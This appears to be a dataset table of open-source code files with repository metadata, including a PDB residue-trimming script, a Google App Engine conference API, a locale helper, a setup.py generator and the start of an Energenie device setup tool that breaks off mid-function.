repo_name (string) | path (string) | copies (string) | size (string) | text (string) | license (string, 15 classes) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool) | ratio (float64) | config_test (bool) | has_no_keywords (bool) | few_assignments (bool)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
demharters/git_scripts | removeFirstLast.py | 1 | 1584 | #! /usr/bin/python
import sys
my_file = sys.argv[1]
myIdx = my_file.find(".pdb")
fout_name = my_file[:myIdx] + "_trunc.pdb"
my_dict = {}
myMax = []
myMin = []
# Create dictionary with chains as keys and lists of residues as values
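# Assumes fixed-width PDB ATOM records: line[21] holds the chain ID, line[23:26] the residue sequence number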
with open(my_file,"r") as f:
for line in f:
if "ATOM" in line:
chain = line[21]
if chain in my_dict:
my_dict[chain].append(line[23:26].strip())
else:
my_dict[chain] = [line[23:26].strip()]
else:
pass
# Create lists for Min and Max residues for each chain
for i in my_dict:
myMax.append(max(my_dict[i], key=lambda x:int(x)))
myMin.append(min(my_dict[i], key=lambda x:int(x)))
# Copy input file without Max and Min residues
with open(my_file,"r") as f:
with open(fout_name,"w") as fout:
for line in f:
if "ATOM" in line:
k = 0
for i in my_dict:
#print "if %s in %s and (%s == %s or %s == %s):"%(i,line[21],line[23:26].strip(),myMax[k],line[23:26].strip(),myMin[k])
if i in line[21] and (line[23:26].strip() == myMax[k] or line[23:26].strip() == myMin[k]):
break
elif i in line[21] and (line[23:26].strip() != myMax[k] or line[23:26].strip() != myMin[k]):
fout.write(line)
else:
pass
k += 1
else:
fout.write(line)
| apache-2.0 | 2,306,010,707,959,049,700 | 26.310345 | 139 | 0.470328 | false | 3.391863 | false | false | false |
odinjv/conference-udacity | conference.py | 1 | 17989 | #!/usr/bin/env python
"""
conference.py -- Udacity conference server-side Python App Engine API;
uses Google Cloud Endpoints
$Id: conference.py,v 1.25 2014/05/24 23:42:19 wesc Exp wesc $
created by wesc on 2014 apr 21
"""
__author__ = '[email protected] (Wesley Chun)'
from datetime import datetime
import endpoints
from protorpc import messages
from protorpc import message_types
from protorpc import remote
from google.appengine.api import memcache
from google.appengine.ext import ndb
from models import Profile
from models import ProfileMiniForm
from models import ProfileForm
from models import StringMessage
from models import BooleanMessage
from models import Conference
from models import ConferenceForm
from models import ConferenceForms
from models import ConferenceQueryForms
from models import Session
from models import SessionForm
from models import SessionForms
from models import SessionQueryForm
from models import SessionQueryForms
from models import Speaker
from settings import WEB_CLIENT_ID
from settings import ANDROID_CLIENT_ID
from settings import IOS_CLIENT_ID
from settings import ANDROID_AUDIENCE
from utils import getUserId
import process.conferences
import process.sessions
import process.profiles
from process.speakers import MEMCACHE_FEATURED_SPEAKER_KEY
from process.announcements import MEMCACHE_ANNOUNCEMENTS_KEY
EMAIL_SCOPE = endpoints.EMAIL_SCOPE
API_EXPLORER_CLIENT_ID = endpoints.API_EXPLORER_CLIENT_ID
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
CONF_GET_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
websafeConferenceKey=messages.StringField(1),
)
CONF_POST_REQUEST = endpoints.ResourceContainer(
ConferenceForm,
websafeConferenceKey=messages.StringField(1),
)
SESSION_POST_REQUEST = endpoints.ResourceContainer(
SessionForm,
websafeConferenceKey=messages.StringField(1)
)
SESSION_QUERY_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
websafeConferenceKey=messages.StringField(1),
typeOfSession=messages.StringField(2)
)
SESSION_SPEAKER_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
speaker=messages.StringField(1)
)
SESSION_GET_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
websafeSessionKey=messages.StringField(1)
)
SESSION_DATE_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
date=messages.StringField(1)
)
SESSION_DURATION_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
min_duration=messages.IntegerField(1),
max_duration=messages.IntegerField(2)
)
SESSION_FILTER_REQUEST = endpoints.ResourceContainer(
message_types.VoidMessage,
not_type=messages.StringField(1, repeated=True),
start_hour=messages.IntegerField(2),
end_hour=messages.IntegerField(3)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@endpoints.api(name='conference', version='v1', audiences=[ANDROID_AUDIENCE],
allowed_client_ids=[WEB_CLIENT_ID, API_EXPLORER_CLIENT_ID,
ANDROID_CLIENT_ID, IOS_CLIENT_ID],
scopes=[EMAIL_SCOPE])
class ConferenceApi(remote.Service):
"""Conference API v0.1"""
# - - - Conference objects - - - - - - - - - - - - - - - - -
@endpoints.method(ConferenceForm, ConferenceForm, path='conference',
http_method='POST', name='createConference')
def createConference(self, request):
"""Create new conference."""
return process.conferences.createConferenceObject(request)
@endpoints.method(CONF_POST_REQUEST, ConferenceForm,
path='conference/{websafeConferenceKey}',
http_method='PUT', name='updateConference')
def updateConference(self, request):
"""Update conference w/provided fields & return w/updated info."""
return process.conferences.updateConferenceObject(request)
@endpoints.method(CONF_GET_REQUEST, ConferenceForm,
path='conference/{websafeConferenceKey}',
http_method='GET', name='getConference')
def getConference(self, request):
"""Return requested conference (by websafeConferenceKey)."""
# get Conference object from request; bail if not found
conf = ndb.Key(urlsafe=request.websafeConferenceKey).get()
if not conf:
raise endpoints.NotFoundException((
'No conference found with key: %s'
)% request.websafeConferenceKey)
prof = conf.key.parent().get()
# return ConferenceForm
return process.conferences.copyConferenceToForm(
conf, getattr(prof, 'displayName')
)
@endpoints.method(message_types.VoidMessage, ConferenceForms,
path='getConferencesCreated',
http_method='POST', name='getConferencesCreated')
def getConferencesCreated(self, request):
"""Return conferences created by user."""
# make sure user is authed
user = endpoints.get_current_user()
if not user:
raise endpoints.UnauthorizedException('Authorization required')
user_id = getUserId(user)
# create ancestor query for all key matches for this user
confs = Conference.query(ancestor=ndb.Key(Profile, user_id))
prof = ndb.Key(Profile, user_id).get()
# return set of ConferenceForm objects per Conference
return ConferenceForms(
items=[
process.conferences.copyConferenceToForm(
conf, getattr(prof, 'displayName')
) for conf in confs
]
)
@endpoints.method(ConferenceQueryForms, ConferenceForms,
path='queryConferences',
http_method='POST',
name='queryConferences')
def queryConferences(self, request):
"""Query for conferences."""
conferences = process.conferences.getQuery(request)
# need to fetch organiser displayName from profiles
# get all keys and use get_multi for speed
organizers = [
(ndb.Key(Profile, conf.organizerUserId)) for conf in conferences
]
profiles = ndb.get_multi(organizers)
# put display names in a dict for easier fetching
names = {}
for profile in profiles:
names[profile.key.id()] = profile.displayName
# return individual ConferenceForm object per Conference
return ConferenceForms(
items=[
process.conferences.copyConferenceToForm(
conf, names[conf.organizerUserId]
) for conf in conferences
]
)
# - - - Session objects - - - - - - - - - - - - - - - - - - -
@endpoints.method(SESSION_POST_REQUEST, SessionForm,
path='conference/{websafeConferenceKey}/createSession',
http_method='POST', name='createSession')
def createSession(self, request):
"""Create a new session in selected conference."""
return process.sessions.createSessionObject(request)
@endpoints.method(CONF_GET_REQUEST, SessionForms,
path='conference/{websafeConferenceKey}/sessions',
http_method='GET', name='getConferenceSessions')
def getConferenceSessions(self, request):
"""List all the sessions on the selected conference."""
c_key = ndb.Key(urlsafe=request.websafeConferenceKey)
if not c_key.get():
raise endpoints.NotFoundException(
(
'No conference found with key: %s'
) % request.websafeConferenceKey
)
sessions = Session.query(ancestor=c_key)
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(
SESSION_QUERY_REQUEST, SessionForms,
path='conference/{websafeConferenceKey}/sessions/{typeOfSession}',
http_method='GET', name='getConferenceSessionsByType'
)
def getConferenceSessionsByType(self, request):
"""List all the sessions of the selected Type."""
c_key = ndb.Key(urlsafe=request.websafeConferenceKey)
if not c_key.get():
raise endpoints.NotFoundException(
(
'No conference found with key: %s'
) % request.websafeConferenceKey
)
sessions = Session.query(ancestor=c_key)
sessions = sessions.filter(
Session.typeOfSession == request.typeOfSession
)
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_SPEAKER_REQUEST, SessionForms,
path='conference/sessions/speaker/{speaker}',
http_method='GET', name='getConferenceBySpeaker')
def getSessionsBySpeaker(self, request):
"""List of the sessions by the selected Speaker."""
speaker = Speaker.query(Speaker.name == request.speaker).get()
if not speaker:
raise endpoints.NotFoundException(
'Speaker %s is not registered' % request.speaker
)
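        # Sessions reference speakers by their websafe key, so match on key.urlsafe() rather than the name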
sessions = Session.query(Session.speakerId == speaker.key.urlsafe())
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_DATE_REQUEST, SessionForms,
path='conference/sessions/date',
http_method='GET', name='getSessionsByDate')
def getSessionsByDate(self, request):
"""List of sessions on the selected date."""
sessions = Session.query()
sessions = sessions.filter(
Session.date == datetime.strptime(
request.date[:10], "%Y-%m-%d"
).date()
)
sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_DURATION_REQUEST, SessionForms,
path='conference/sessions/duration',
http_method='GET', name='getSessionsByDuration')
def getSessionsByDuration(self, request):
"""List of sessions within the specified duration."""
sessions = Session.query()
sessions = sessions.filter(
Session.duration >= request.min_duration
)
sessions = sessions.filter(
Session.duration <= request.max_duration
)
sessions = sessions.order(Session.duration)
sessions = sessions.order(Session.startTime)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
@endpoints.method(SESSION_FILTER_REQUEST, SessionForms,
path='conference/sessions/filter',
http_method='GET', name='filterSessions')
def queryProblem(self, request):
"""Filter sessions by time of the day and type of session."""
sessions = Session.query()
sessions = sessions.filter(Session.startTime >= request.start_hour)
sessions = sessions.filter(Session.startTime <= request.end_hour)
sessions = sessions.order(Session.startTime)
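        # Datastore allows inequality filters on only one property (startTime here), so the typeOfSession exclusion below is done in Python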
items = []
for sess in sessions:
if sess.typeOfSession not in request.not_type:
items.append(process.sessions.copySessionToForm(sess))
return SessionForms(
items=items
)
@endpoints.method(SessionQueryForms, SessionForms,
path='conference/sessions/query',
http_method='GET', name='querySessions')
def querySessions(self, request):
"""Query sessions with user provided filters"""
sessions = process.sessions.getQuery(request)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
# - - - Featured Speaker - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, StringMessage,
path='conference/featured_speaker/get',
http_method='GET', name='getFeaturedSpeaker')
def getFeaturedSpeaker(self, request):
"""Return Featured Speaker from memcache."""
return StringMessage(
data=memcache.get(MEMCACHE_FEATURED_SPEAKER_KEY) or ""
)
# - - - Wishlist - - - - - - - - - - - - - - - - - - - - - - -
@endpoints.method(SESSION_GET_REQUEST, BooleanMessage,
path='addSessionToWishlist/{websafeSessionKey}',
http_method='POST', name='addSessionToWishlist')
def addSessionToWishlist(self, request):
"""Add a session to user Wishlist."""
prof = process.profiles.getProfileFromUser()
session = ndb.Key(urlsafe=request.websafeSessionKey).get()
if not session:
raise endpoints.NotFoundException(
'Session Not Found'
)
if not isinstance(session, Session):
raise endpoints.BadRequestException(
'Element provided is not a Session'
)
prof.sessionsWishlist.append(request.websafeSessionKey)
prof.put()
return BooleanMessage(data=True)
@endpoints.method(message_types.VoidMessage, SessionForms,
path='wishlist', http_method='GET',
name='getSessionsWishlist')
def getSessionsInWishlist(self, request):
"""List sessions saved on user Wishlist."""
prof = process.profiles.getProfileFromUser()
sess_keys = [ndb.Key(urlsafe=wsck) for wsck in prof.sessionsWishlist]
sessions = ndb.get_multi(sess_keys)
return SessionForms(
items=[
process.sessions.copySessionToForm(sess) for sess in sessions
]
)
# - - - Profile objects - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, ProfileForm,
path='profile', http_method='GET', name='getProfile')
def getProfile(self, request):
"""Return user profile."""
return process.profiles.doProfile()
@endpoints.method(ProfileMiniForm, ProfileForm,
path='profile', http_method='POST', name='saveProfile')
def saveProfile(self, request):
"""Update & return user profile."""
return process.profiles.doProfile(request)
# - - - Announcements - - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, StringMessage,
path='conference/announcement/get',
http_method='GET', name='getAnnouncement')
def getAnnouncement(self, request):
"""Return Announcement from memcache."""
return StringMessage(
data=memcache.get(MEMCACHE_ANNOUNCEMENTS_KEY) or ""
)
# - - - Registration - - - - - - - - - - - - - - - - - - - -
@endpoints.method(message_types.VoidMessage, ConferenceForms,
path='conferences/attending',
http_method='GET', name='getConferencesToAttend')
def getConferencesToAttend(self, request):
"""Get list of conferences that user has registered for."""
prof = process.profiles.getProfileFromUser() # get user Profile
conf_keys = [
ndb.Key(urlsafe=wsck) for wsck in prof.conferenceKeysToAttend
]
conferences = ndb.get_multi(conf_keys)
# get organizers
organisers = [
ndb.Key(Profile, conf.organizerUserId) for conf in conferences
]
profiles = ndb.get_multi(organisers)
# put display names in a dict for easier fetching
names = {}
for profile in profiles:
names[profile.key.id()] = profile.displayName
# return set of ConferenceForm objects per Conference
return ConferenceForms(
items=[process.conferences.copyConferenceToForm(
conf, names[conf.organizerUserId]
) for conf in conferences]
)
@endpoints.method(CONF_GET_REQUEST, BooleanMessage,
path='conference/{websafeConferenceKey}',
http_method='POST', name='registerForConference')
def registerForConference(self, request):
"""Register user for selected conference."""
return process.conferences.conferenceRegistration(request)
@endpoints.method(CONF_GET_REQUEST, BooleanMessage,
path='conference/{websafeConferenceKey}',
http_method='DELETE', name='unregisterFromConference')
def unregisterFromConference(self, request):
"""Unregister user for selected conference."""
return process.conferences.conferenceRegistration(request, reg=False)
@endpoints.method(message_types.VoidMessage, ConferenceForms,
path='filterPlayground',
http_method='GET', name='filterPlayground')
def filterPlayground(self, request):
"""Filter Playground"""
q = Conference.query()
# field = "city"
# operator = "="
# value = "London"
# f = ndb.query.FilterNode(field, operator, value)
# q = q.filter(f)
q = q.filter(Conference.city == "London")
q = q.filter(Conference.topics == "Medical Innovations")
q = q.filter(Conference.month == 6)
return ConferenceForms(
items=[
process.conferences.copyConferenceToForm(conf,
"") for conf in q
]
)
api = endpoints.api_server([ConferenceApi]) # register API
| apache-2.0 | 7,087,268,235,147,335,000 | 36.090722 | 77 | 0.627773 | false | 4.19324 | false | false | false |
Outernet-Project/librarian | librarian/helpers/lang.py | 1 | 1268 | # -*- coding: utf-8 -*-
"""
lang.py: Locale constants
Copyright 2014-2015, Outernet Inc.
Some rights reserved.
This software is free software licensed under the terms of GPLv3. See COPYING
file that comes with the source code, or http://www.gnu.org/licenses/gpl.txt.
"""
from __future__ import unicode_literals
from bottle_utils.i18n import lazy_gettext as _
from ..core.contrib.i18n.consts import LOCALES, LANGS
from ..core.contrib.templates.decorators import template_helper
SELECT_LANGS = [('', _('any language'))] + LANGS
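# ISO 639-1 codes written right-to-left: Arabic, Hebrew (he/iw), Urdu, Yiddish (yi/ji), Persian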
RTL_LANGS = ['ar', 'he', 'ur', 'yi', 'ji', 'iw', 'fa']
def lang_name(code):
""" Return native language name for locale code """
return LOCALES[code]
@template_helper()
def lang_name_safe(code):
""" Return native language name for locale code """
try:
return lang_name(code)
except KeyError:
return _('unknown')
@template_helper()
def is_rtl(code):
return code in RTL_LANGS
@template_helper()
def dir(code):
return 'rtl' if code in RTL_LANGS else 'auto'
@template_helper()
def i18n_attrs(lang):
s = ''
if lang:
# XXX: Do we want to keep the leading space?
s += ' lang="%s"' % lang
if template_helper.is_rtl(lang):
s += ' dir="rtl"'
return s
| gpl-3.0 | -4,302,272,209,746,936,000 | 21.245614 | 77 | 0.649054 | false | 3.328084 | false | false | false |
vyscond/nest | nest/__init__.py | 1 | 2910 | import os
import re
import json
import argparse
import pip
import copy
from collections import OrderedDict
from setuptools import find_packages
BASE_FOLDER = os.path.basename(os.path.abspath('.')).replace(' ', '-').lower()
EXCLUDE_FOLDERS = ['contrib','docs','tests*']
TEXT_FILES = '([A-Za-z]+)(\_[A-Za-z]+)*\.(rst|md)$'
SETUPPY = 'from setuptools import setup\nsetup(\n{args}\n)\n'
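# CONSOLE_SCRIPT matches setuptools-style entry points of the form "name=package.module:function"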
CONSOLE_SCRIPT = '^([A-Za-z]+)(\_([A-Za-z]+))*\=([A-Za-z]+(\_[A-Za-z]+)*)(\.[A-Za-z]+(\_[A-Za-z]+)*)*\:([A-Za-z]+)(\_([A-Za-z]+))*$'
CLASSIFIERS = ''.join(open('classifiers.txt')).split('\n')
class ConsoleScripts(OrderedDict):
    def add(self):
        # Body missing in the original source; stubbed so the module parses.
        raise NotImplementedError
class Setup(OrderedDict):
    def __init__(self, fname='setup.json'):
        self.file = fname  # remember the target file so save() can write back to it
        try:
with open(fname) as f:
setup = json.load(f, object_pairs_hook=OrderedDict)
except IOError:
setup = OrderedDict()
super(Setup, self).__init__(setup)
def __str__(self):
return json.dumps(self, indent=4)
def save(self):
with open(self.file, 'w') as f:
f.write(str(self))
class Setup2(OrderedDict):
def __init__(self):
self.file = 'setup.json'
try:
with open(self.file) as f:
setup = json.load(f, object_pairs_hook=OrderedDict)
except IOError:
setup = OrderedDict()
        super(Setup2, self).__init__(setup)
def __str__(self): # debug only
return json.dumps(self, indent=4)
def save(self):
with open(self.file, 'w') as f:
f.write(str(self))
def add_console_scripts(self, name, module):
if re.match(CONSOLE_SCRIPT, name+'='+module):
if 'entry_points' not in self.keys():
self['entry_points'] = {}
self['entry_points']['console_scripts'] = {}
self['entry_points']['console_scripts'][name] = module
else:
return 1
def gen(self):
'''generates a new setup.py based on your setup.json'''
setuppy = copy.deepcopy(self)
# - Adjust console scripts
setuppy['entry_points']['console_scripts'] = []
for name, module in self['entry_points']['console_scripts'].items():
setuppy['entry_points']['console_scripts'].append(
'{}={}'.format(name, module)
)
setuppy = json.dumps(setuppy, indent=4)
# - Adjust file based entries
for key in ['long_description']:
if re.match(TEXT_FILES, self[key]) :
setuppy=setuppy.replace(
'"'+self[key]+'"', '"".join(open("'+self[key]+'"))'
)
# - Replacing ":" for "="
for basekey in self.keys():
setuppy = setuppy.replace('"'+basekey+'":', basekey+' =')
setuppy = setuppy[1:-1]
with open('setup.py', 'w') as f:
f.write(SETUPPY.format(args=setuppy))
| mit | -7,759,981,346,841,378,000 | 30.978022 | 132 | 0.540206 | false | 3.579336 | false | false | false |
pythonindia/junction | junction/proposals/forms.py | 1 | 9639 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django import forms
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from pagedown.widgets import PagedownWidget
from junction.base.constants import (
ConferenceSettingConstants,
ProposalReviewerComment,
ProposalReviewStatus,
ProposalStatus,
ProposalTargetAudience,
ProposalVotesFilter,
)
from junction.proposals.models import (
ProposalSection,
ProposalSectionReviewerVoteValue,
ProposalType,
)
def _get_proposal_section_choices(conference, action="edit"):
if action == "create":
return [
(str(cps.id), cps.name)
for cps in ProposalSection.objects.filter(conferences=conference)
]
else:
return [
(str(cps.id), cps.name)
for cps in ProposalSection.objects.filter(conferences=conference)
]
def _get_proposal_type_choices(conference, action="edit"):
if action == "create":
return [
(str(cpt.id), cpt.name)
for cpt in ProposalType.objects.filter(
conferences=conference, end_date__gt=now()
)
]
else:
return [
(str(cpt.id), cpt.name)
for cpt in ProposalType.objects.filter(conferences=conference)
]
def _get_proposal_section_reviewer_vote_choices(conference):
allow_plus_zero_vote = ConferenceSettingConstants.ALLOW_PLUS_ZERO_REVIEWER_VOTE
plus_zero_vote_setting = conference.conferencesetting_set.filter(
name=allow_plus_zero_vote["name"]
).first()
if plus_zero_vote_setting:
plus_zero_vote_setting_value = plus_zero_vote_setting.value
else:
plus_zero_vote_setting_value = True
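    # Hide the "0" vote option unless the conference setting explicitly allows +0 reviewer votes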
values = []
for i in ProposalSectionReviewerVoteValue.objects.all().reverse():
if i.vote_value == 0 and not plus_zero_vote_setting_value:
continue
values.append((i.vote_value, "{}".format(i.description)))
return values
class HorizRadioRenderer(forms.RadioSelect.renderer):
"""
This overrides widget method to put radio buttons horizontally instead of vertically.
"""
def render(self):
"""Outputs radios"""
return mark_safe("\n".join(["%s\n" % w for w in self]))
class ProposalForm(forms.Form):
"""
Used for create/edit
"""
title = forms.CharField(
min_length=10,
help_text="Title of the Proposal",
widget=forms.TextInput(attrs={"class": "charfield"}),
)
description = forms.CharField(
widget=PagedownWidget(show_preview=True), help_text=("Describe your Proposal")
)
target_audience = forms.ChoiceField(
label="Target Audience",
choices=ProposalTargetAudience.CHOICES,
widget=forms.Select(attrs={"class": "dropdown"}),
)
status = forms.ChoiceField(
widget=forms.Select(attrs={"class": "dropdown"}),
choices=ProposalStatus.CHOICES,
help_text=(
"If you choose DRAFT people can't see the session in the list."
" Make the proposal PUBLIC when you're done editing."
),
)
proposal_type = forms.ChoiceField(
label="Proposal Type", widget=forms.Select(attrs={"class": "dropdown"})
)
proposal_section = forms.ChoiceField(
label="Proposal Section", widget=forms.Select(attrs={"class": "dropdown"})
)
# Additional Content
prerequisites = forms.CharField(
label="Pre-requisites",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="What should the participants know before attending your session?",
)
video_url = forms.CharField(
label="Video URL",
required=False,
help_text="Short 1-2 min video describing your talk",
widget=forms.TextInput(attrs={"class": "charfield"}),
)
content_urls = forms.CharField(
label="Content URLs",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="Links to your session like GitHub repo, Blog, Slideshare etc ...",
)
private_content_urls = forms.BooleanField(
help_text="Check the box if you want to make your content URLs private",
label="Make the context URLs private",
required=False,
)
speaker_info = forms.CharField(
label="Speaker Information",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="Say something about yourself, work etc...",
)
is_first_time_speaker = forms.BooleanField(
label="First Time Speaker",
required=False,
help_text="Please mark, if you are a first time speaker for any conference or meetup,"
"not just for PyCon India",
)
speaker_links = forms.CharField(
label="Speaker Links",
widget=PagedownWidget(show_preview=True),
required=False,
help_text="Links to your previous work like Blog, Open Source Contributions etc ...",
)
def __init__(self, conference, action="edit", *args, **kwargs):
super(ProposalForm, self).__init__(*args, **kwargs)
self.fields["proposal_section"].choices = _get_proposal_section_choices(
conference, action=action
)
self.fields["proposal_type"].choices = _get_proposal_type_choices(
conference, action=action
)
@classmethod
def populate_form_for_update(self, proposal):
form = ProposalForm(
proposal.conference,
initial={
"title": proposal.title,
"description": proposal.description,
"target_audience": proposal.target_audience,
"prerequisites": proposal.prerequisites,
"video_url": proposal.video_url,
"content_urls": proposal.content_urls,
"private_content_urls": proposal.private_content_urls,
"speaker_info": proposal.speaker_info,
"speaker_links": proposal.speaker_links,
"is_first_time_speaker": proposal.is_first_time_speaker,
"status": proposal.status,
"proposal_section": proposal.proposal_section.pk,
"proposal_type": proposal.proposal_type.pk,
},
)
return form
class ProposalCommentForm(forms.Form):
"""
Used to add comments
"""
comment = forms.CharField(widget=PagedownWidget(show_preview=True))
private = forms.BooleanField(required=False, widget=forms.HiddenInput())
reviewer = forms.BooleanField(required=False, widget=forms.HiddenInput())
class ProposalReviewForm(forms.Form):
"""
Used to review the proposal.
"""
review_status = forms.ChoiceField(
choices=ProposalReviewStatus.CHOICES, widget=forms.RadioSelect()
)
class ProposalReviewerVoteForm(forms.Form):
"""
Used by ProposalSectionReviewers to vote on proposals.
"""
vote_value = forms.ChoiceField(
widget=forms.RadioSelect(),
label="Do you think this proposal will make a good addition to PyCon India ?",
)
comment = forms.CharField(
widget=forms.Textarea(attrs={"minlength": "30"}),
help_text="Leave a comment justifying your vote.",
)
def __init__(self, *args, **kwargs):
conference = kwargs.pop("conference", None)
super(ProposalReviewerVoteForm, self).__init__(*args, **kwargs)
choices = _get_proposal_section_reviewer_vote_choices(conference)
self.fields["vote_value"].choices = choices
class ProposalTypesChoices(forms.Form):
"""
Base proposal form with proposal sections & types.
"""
proposal_section = forms.ChoiceField(
widget=forms.Select(attrs={"class": "dropdown"})
)
proposal_type = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown"}))
def __init__(self, conference, *args, **kwargs):
super(ProposalTypesChoices, self).__init__(*args, **kwargs)
self.fields["proposal_section"].choices = _get_proposal_section_choices(
conference
)
self.fields["proposal_type"].choices = _get_proposal_type_choices(conference)
class ProposalsToReviewForm(ProposalTypesChoices):
"""
Used to filter proposals
"""
reviewer_comment = forms.ChoiceField(
widget=forms.Select(attrs={"class": "dropdown"})
)
def __init__(self, conference, proposal_sections, *args, **kwargs):
super(ProposalsToReviewForm, self).__init__(conference, *args, **kwargs)
ps_choices = [(str(ps.id), ps.name) for ps in proposal_sections]
self.fields["reviewer_comment"].choices = ProposalReviewerComment.CHOICES
self.fields["proposal_section"].choices = ps_choices
for name, field in list(self.fields.items()):
field.choices.insert(0, ("all", "All"))
class ProposalVotesFilterForm(ProposalTypesChoices):
"""
Form to filter proposals based on votes and review_status.
"""
votes = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown votes"}))
review_status = forms.ChoiceField(widget=forms.Select(attrs={"class": "dropdown"}))
def __init__(self, conference, *args, **kwargs):
super(ProposalVotesFilterForm, self).__init__(conference, *args, **kwargs)
self.fields["votes"].choices = ProposalVotesFilter.CHOICES
self.fields["review_status"].choices = ProposalReviewStatus.CHOICES
for name, field in list(self.fields.items()):
field.choices.insert(0, ("all", "All"))
| mit | -3,384,632,938,890,905,600 | 33.060071 | 94 | 0.637514 | false | 4.036432 | false | false | false |
decabyte/vehicle_core | scripts/trajectory_cli.py | 1 | 4003 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import sys
import argparse
import numpy as np
np.set_printoptions(precision=3, suppress=True)
from numpy import cos, sin
# fix imports
sys.path.append('../src')
from vehicle_core.path import trajectory_tools as tt
# constants
T_TYPES = [
'surge',
'sway',
'heave',
'yaw',
'surge+heave',
'sway+heave',
'yaw+heave'
]
def main():
parser = argparse.ArgumentParser(description="Utility for generating navigation trajectories used by navigator module.",
epilog="This is part of vehicle_pilot module.")
parser.add_argument('type', choices=T_TYPES, metavar='type', help='Specify the DOFs used by the trajectory.')
parser.add_argument('n', type=float, help='Initial NORTH coordinate.')
parser.add_argument('e', type=float, help='Initial EAST coordinate.')
parser.add_argument('d', type=float, help='Initial DEPTH coordinate.')
parser.add_argument('y', type=float, help='Initial YAW coordinate.')
parser.add_argument('delta_dof', type=float, metavar='delta_dof', help='Maximum displacement in <type> trajectory.')
parser.add_argument('--output', default='json', help='Output trajectory format.')
parser.add_argument('-v', '--verbose', action='store_true', help='Print detailed information.')
args = parser.parse_args()
# check displacement
if args.delta_dof < 1 or args.delta_dof > 15:
print('Could not generate trajectory with {} maximum displacement.\n'.format(args.delta_dof))
sys.exit(1)
if args.d < 0 or args.d > 3:
        print('Could not generate trajectory with {} initial depth (expected 0 to 3).\n'.format(args.d))
sys.exit(1)
if args.y > np.pi or args.y < -np.pi:
print('Could not generate trajectory with {} yaw angle (-pi, pi).\n'.format(args.y))
sys.exit(1)
# waypoints matrix
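    # C out-and-back cycles give 2*C+1 waypoints: odd rows hold the displaced positions, even rows return to the start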
C = 10
N = 2 * C + 1
WPS = np.zeros((N, 6))
# initial position
INIT = np.array([args.n, args.e, args.d, 0, 0, args.y])
WPS = np.tile(INIT, (N, 1))
# displacements
dw = [args.delta_dof]
# select geometry
if args.type == 'surge':
dof = [0]
elif args.type == 'sway':
dof = [1]
elif args.type == 'heave':
dof = [2]
dw = [min(args.delta_dof, 3)]
elif args.type == 'yaw':
dof = [5]
elif args.type == 'surge+heave':
dof = [0,2]
dw = [args.delta_dof, min(args.delta_dof, 3)]
elif args.type == 'sway+heave':
dof = [1,2]
dw = [args.delta_dof, min(args.delta_dof, 3)]
elif args.type == 'yaw+heave':
dof = [5,2]
dw = [args.delta_dof, min(args.delta_dof, 3)]
else:
print('Could not generate {} trajectory geometry.\n'.format(args.type))
sys.exit(1)
# trajectory generation
for i,d in enumerate(dof):
w_max = WPS[0, d] + dw[i]
w_min = WPS[0, d] + np.ceil(dw[i] / N)
WPS[1::2, d] = np.linspace(w_max, w_min, num=C)
WPS[2::2, d] = WPS[0, d] * np.ones((C,))
# compensate for initial yaw
ROT = np.eye(6) # rotation matrix
r = 0 # roll
p = 0 # pitch
y = WPS[0,5] # yaw
# set the rotation using current attitude
ROT[0:2, 0:2] = [
[cos(p)*cos(y), cos(r)*sin(y)+sin(r)*sin(p)*cos(y)],
[-cos(p)*sin(y), cos(r)*cos(y)-sin(r)*sin(p)*sin(y)]
]
# apply rotation
WPR = np.dot(WPS, ROT)
# trajectory export
spec = {
'type': args.type,
'delta': dw,
'dof': dof
}
if args.verbose:
print(WPS)
print(' ')
print(WPR)
print(' ')
tt.plot_trajectory(WPR, arrow_length=0.2)
# print final trajectory
try:
import yaml
print(yaml.dump(tt.traj_as_dict(WPR, **spec)))
except ImportError:
import json
print(json.dumps(tt.traj_as_dict(WPR, **spec)))
if __name__ == '__main__':
main()
| bsd-3-clause | 1,329,321,018,923,603,700 | 26.798611 | 125 | 0.57307 | false | 3.149489 | false | false | false |
adtennant/homebridge-energenie | lib/pyenergenie/src/setup_tool.py | 2 | 8531 | # setup_tool.py 28/05/2016 D.J.Whale
#
# A simple menu-driven setup tool for the Energenie Python library.
#
# Just be a simple menu system.
# This then means you don't have to have all this in the demo apps
# and the demo apps can just refer to object variables names
# from an assumed auto_create registry, that is built using this setup tool.
import time
import energenie
##from energenie.lifecycle import *
#===== GLOBALS =====
quit = False
#===== INPUT METHODS ==========================================================
try:
readin = raw_input # Python 2
except NameError:
readin = input # Python 3
def get_house_code():
"""Get a house code or default to Energenie code"""
while True:
try:
hc = readin("House code (ENTER for default)? ")
if hc == "": return None
except KeyboardInterrupt:
